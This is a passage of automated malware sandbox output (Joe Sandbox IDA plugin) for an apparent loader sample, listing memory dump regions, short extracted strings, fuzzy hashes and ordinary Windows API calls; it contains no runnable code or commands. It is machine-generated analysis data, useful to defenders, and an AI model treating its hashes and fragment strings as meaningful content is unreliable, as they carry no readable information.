                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: _lnu$gav`
                                                                                                                      • API String ID: 0-2746408054
                                                                                                                      • Opcode ID: 596df4c367a22ad9e4bb932596eb35b049ddd14699b744f4d00e616af24bd3fa
                                                                                                                      • Instruction ID: 8d84986b69dcabfb9ee5ef4d91c1787ae80dd95795058843ca50a1b2a4abe712
                                                                                                                      • Opcode Fuzzy Hash: 596df4c367a22ad9e4bb932596eb35b049ddd14699b744f4d00e616af24bd3fa
                                                                                                                      • Instruction Fuzzy Hash: CBA1E470604B818FE32ACF39C4607B3BBE1AF96305F18895DC1EB8B392D77565098B55
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8&$TU
                                                                                                                      • API String ID: 0-697040407
                                                                                                                      • Opcode ID: 87772b0907a8c6011020926a42aeafa4a3dfce88e1875cc1dd4270d8d4d27a2c
                                                                                                                      • Instruction ID: 9324d3e60b6a8bbdf1013a7308e670c93f152f632742e0b8a0592e3bd5a1fb84
                                                                                                                      • Opcode Fuzzy Hash: 87772b0907a8c6011020926a42aeafa4a3dfce88e1875cc1dd4270d8d4d27a2c
                                                                                                                      • Instruction Fuzzy Hash: 1A71DEB05087418BC715CF69C8A276BB7F0EFA9364F18991CE4D58B391E3B4C985CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (+$P7T)
                                                                                                                      • API String ID: 0-1314400319
                                                                                                                      • Opcode ID: b67460535bc2a92cba6805e8989cc5b43a352196e4157dfd4920d87d7efd6eb8
                                                                                                                      • Instruction ID: 9d29231831988a6284df1494e95cf0fbe608c4b44baee50e8891db04dff778fa
                                                                                                                      • Opcode Fuzzy Hash: b67460535bc2a92cba6805e8989cc5b43a352196e4157dfd4920d87d7efd6eb8
                                                                                                                      • Instruction Fuzzy Hash: 78610DB0508791CBC724CF15D8A176BB7F0EF92724F089E1CE8E58B291E3788945CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: U123$['e!
                                                                                                                      • API String ID: 0-1796562098
                                                                                                                      • Opcode ID: fb9722cd765a8f1f667f1c5091e886384392bc66525bf14e4da9e340b7674b2c
                                                                                                                      • Instruction ID: 4eed49639a68c285c632c5086ed668ab9398e64d5d9a1521270edd373996c009
                                                                                                                      • Opcode Fuzzy Hash: fb9722cd765a8f1f667f1c5091e886384392bc66525bf14e4da9e340b7674b2c
                                                                                                                      • Instruction Fuzzy Hash: 5581AAB160C3958FD714CF28D89076FBBE0AFC5714F04892DE5D99B282D7B889498B82
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0$T
                                                                                                                      • API String ID: 0-1187268809
                                                                                                                      • Opcode ID: d184b7ad746bfd29d2089b56f9ae5095a2bb1cac60152be077c7504b51e14a1b
                                                                                                                      • Instruction ID: 76cd17c8991f488d8aba02e49121924803925fbdc1cd900e8d75d1de02b36e74
                                                                                                                      • Opcode Fuzzy Hash: d184b7ad746bfd29d2089b56f9ae5095a2bb1cac60152be077c7504b51e14a1b
                                                                                                                      • Instruction Fuzzy Hash: 2A719DB06083448FD718CF14C891B6BBBE6EF89314F24882DFA958B3A1C775D855CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: /.-,$@
                                                                                                                      • API String ID: 0-3723685748
                                                                                                                      • Opcode ID: 14b47141bad7744aef7bc387c9587b37535cf199f5fcc04529429db9ed98bd49
                                                                                                                      • Instruction ID: 1cd1be7c8e2a1740df5f21c1152028bb2444e94d3dad7dfc80d0378bcdf821cb
                                                                                                                      • Opcode Fuzzy Hash: 14b47141bad7744aef7bc387c9587b37535cf199f5fcc04529429db9ed98bd49
                                                                                                                      • Instruction Fuzzy Hash: 604103B09143118BD704AF14E88576AB7F0FF94328F14C62CEA99573E2E7359A14C782
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !$s%u'
                                                                                                                      • API String ID: 0-439224852
                                                                                                                      • Opcode ID: 9f12cfbe8f813cdc99b4eaff1b801d2e6fd59d9a3446994fbc70c022c850fc17
                                                                                                                      • Instruction ID: 02ce6a5054db96726ffde291dae82217e5df077cdabaad39923507b4d846af6b
                                                                                                                      • Opcode Fuzzy Hash: 9f12cfbe8f813cdc99b4eaff1b801d2e6fd59d9a3446994fbc70c022c850fc17
                                                                                                                      • Instruction Fuzzy Hash: 6441F6B66993418FD304CF56D8C425BBBE7AFC5304F199D6CE1948B345CBB8C50A8B52
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0$8
                                                                                                                      • API String ID: 0-46163386
                                                                                                                      • Opcode ID: 0efc1294e32fe2dc1f15a8140f78967acb3ef10ebe1a0021df57d37c3e985f00
                                                                                                                      • Instruction ID: 32a187033c48b92d56eeb35f99c41d4ca2a3b68c77445a285bdcb57d47e6751f
                                                                                                                      • Opcode Fuzzy Hash: 0efc1294e32fe2dc1f15a8140f78967acb3ef10ebe1a0021df57d37c3e985f00
                                                                                                                      • Instruction Fuzzy Hash: 9531133660D3C58FC315CA28D480A9FBFE2AFE6254F08494CE8C897352C674D949CB93
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 0-2766056989
                                                                                                                      • Opcode ID: 5d5fee6f854f4cc3e9978a30db991d18a4c44d502c45dc1ba387623374671fb8
                                                                                                                      • Instruction ID: d41455c1354e9f984b51e18bd111f0fad864a5cc2790371b612dd3b9a2b37d5e
                                                                                                                      • Opcode Fuzzy Hash: 5d5fee6f854f4cc3e9978a30db991d18a4c44d502c45dc1ba387623374671fb8
                                                                                                                      • Instruction Fuzzy Hash: 1C9205316083519FC719CE28C894B6ABBE2AFEA354F18862DF895C7392D334DD45CB81
                                                                                                                      APIs
                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001A906F,?,?,00000008,?,?,001B14E5,00000000), ref: 001A92A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionRaise
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3997070919-0
                                                                                                                      • Opcode ID: c807e6d11d355916fd1871b2023f326ed4d6d3be98fd9a91c8ce66f7ea239b4b
                                                                                                                      • Instruction ID: 90333d4f9bf3d511af0e37a4d6ab85f3336f0f049aca9d41e7101958b45a498f
                                                                                                                      • Opcode Fuzzy Hash: c807e6d11d355916fd1871b2023f326ed4d6d3be98fd9a91c8ce66f7ea239b4b
                                                                                                                      • Instruction Fuzzy Hash: 97B15D39610609DFDB19CF28C48AB657BF1FF46364F258659E89ACF2A1C335E981CB40
                                                                                                                      APIs
                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00196E85
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2325560087-0
                                                                                                                      • Opcode ID: ba9e2467662cd4c6c08647353e035190b448d2dc5e3e0cbbd08f6150c4e31637
                                                                                                                      • Instruction ID: 26a945103a6a20b131ec8d6032a44276589b5b8ecc4ad30489734be214fd6e15
                                                                                                                      • Opcode Fuzzy Hash: ba9e2467662cd4c6c08647353e035190b448d2dc5e3e0cbbd08f6150c4e31637
                                                                                                                      • Instruction Fuzzy Hash: DFA18DB5E146058FDB18DF68EC8269DBBF1FB48314F14862AE419EB790D3749880CF90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7e4g
                                                                                                                      • API String ID: 0-1784156611
                                                                                                                      • Opcode ID: 7f5b4d31056eb29012149fd956ad457f27fd3afe1bcf07fbe2cca6404ed376c9
                                                                                                                      • Instruction ID: 5a0e581880f46faafe86bef2ea8d864c98e7a41f438d0511f29089cbf95a9f28
                                                                                                                      • Opcode Fuzzy Hash: 7f5b4d31056eb29012149fd956ad457f27fd3afe1bcf07fbe2cca6404ed376c9
                                                                                                                      • Instruction Fuzzy Hash: DCD1F871505B808ED7268F35C8517A3BBE2AF97304F1889ACC0EB8B387C779A506CB55
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "
                                                                                                                      • API String ID: 0-123907689
                                                                                                                      • Opcode ID: 167a229d93af2f3fcaec2ea9350f6d5f63d084a78ccf1060cfe67d9ad9d031b2
                                                                                                                      • Instruction ID: 936ee2b17ff3dd0011ca6f0c28b321a4d2b9a00a041242d43e2d8353bb5d2ab0
                                                                                                                      • Opcode Fuzzy Hash: 167a229d93af2f3fcaec2ea9350f6d5f63d084a78ccf1060cfe67d9ad9d031b2
                                                                                                                      • Instruction Fuzzy Hash: E1D135B2A08B845FD724CE26E481B6FB7E5AFD1354F19892DE48A87381E734DD44C782
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d3184a0ec054909e325b8ce640e27905cf5fc95e396ddf457d72f13f36e2b83a
                                                                                                                      • Instruction ID: 8a380481a20c2bee7db281587245acd9c56db4a2fb574b801275d2217bb40ca5
                                                                                                                      • Opcode Fuzzy Hash: d3184a0ec054909e325b8ce640e27905cf5fc95e396ddf457d72f13f36e2b83a
                                                                                                                      • Instruction Fuzzy Hash: 9A31B776900219AFCB20EFA9DC85DBB777DEB85314F144559F815D7245EB30EE808B90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %*+(
                                                                                                                      • API String ID: 0-3233224373
                                                                                                                      • Opcode ID: b29c564438925c3d96467325200ae336ebd7521098b972593b0ffd4d5b9ce038
                                                                                                                      • Instruction ID: 44eb8d332fab0c9a4f6eb82036847e95bc9066e8de1b853a56cd7763f646e604
                                                                                                                      • Opcode Fuzzy Hash: b29c564438925c3d96467325200ae336ebd7521098b972593b0ffd4d5b9ce038
                                                                                                                      • Instruction Fuzzy Hash: 5AA134B1A087818BD7159F26C88072FB7E2EF95754F18892DE9858B382E334D945CB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
                                                                                                                        • Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB
                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001ACA2A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3736152602-0
                                                                                                                      • Opcode ID: 51f18b36cb8b1dcdf7a2cd6506f5fccd4f428ae4979d66267acfed04a5c3193d
                                                                                                                      • Instruction ID: 97e85fbca593618338629581bed875d5625d537a3b19c89060c662aa3f9620dc
                                                                                                                      • Opcode Fuzzy Hash: 51f18b36cb8b1dcdf7a2cd6506f5fccd4f428ae4979d66267acfed04a5c3193d
                                                                                                                      • Instruction Fuzzy Hash: AD219F7A61020AABDB28EF65DC42ABA77ACEF56314F10407AF906D7141FB74ED408B90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: FKYW
                                                                                                                      • API String ID: 0-2105710742
                                                                                                                      • Opcode ID: c382b0799cc131b0dcaf5d4eecf6c55e74b988057bbdf1f1d940c59e0b7dfa2f
                                                                                                                      • Instruction ID: 0f6d6b7fd86f8c5b12f41e9bd0489700c83d5d9882428ae7080c043dd714fa98
                                                                                                                      • Opcode Fuzzy Hash: c382b0799cc131b0dcaf5d4eecf6c55e74b988057bbdf1f1d940c59e0b7dfa2f
                                                                                                                      • Instruction Fuzzy Hash: CEA1F6325087D18FC315CF29885066EBBE2AF96724F198B5CF4E99B391C735D842CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 0-2766056989
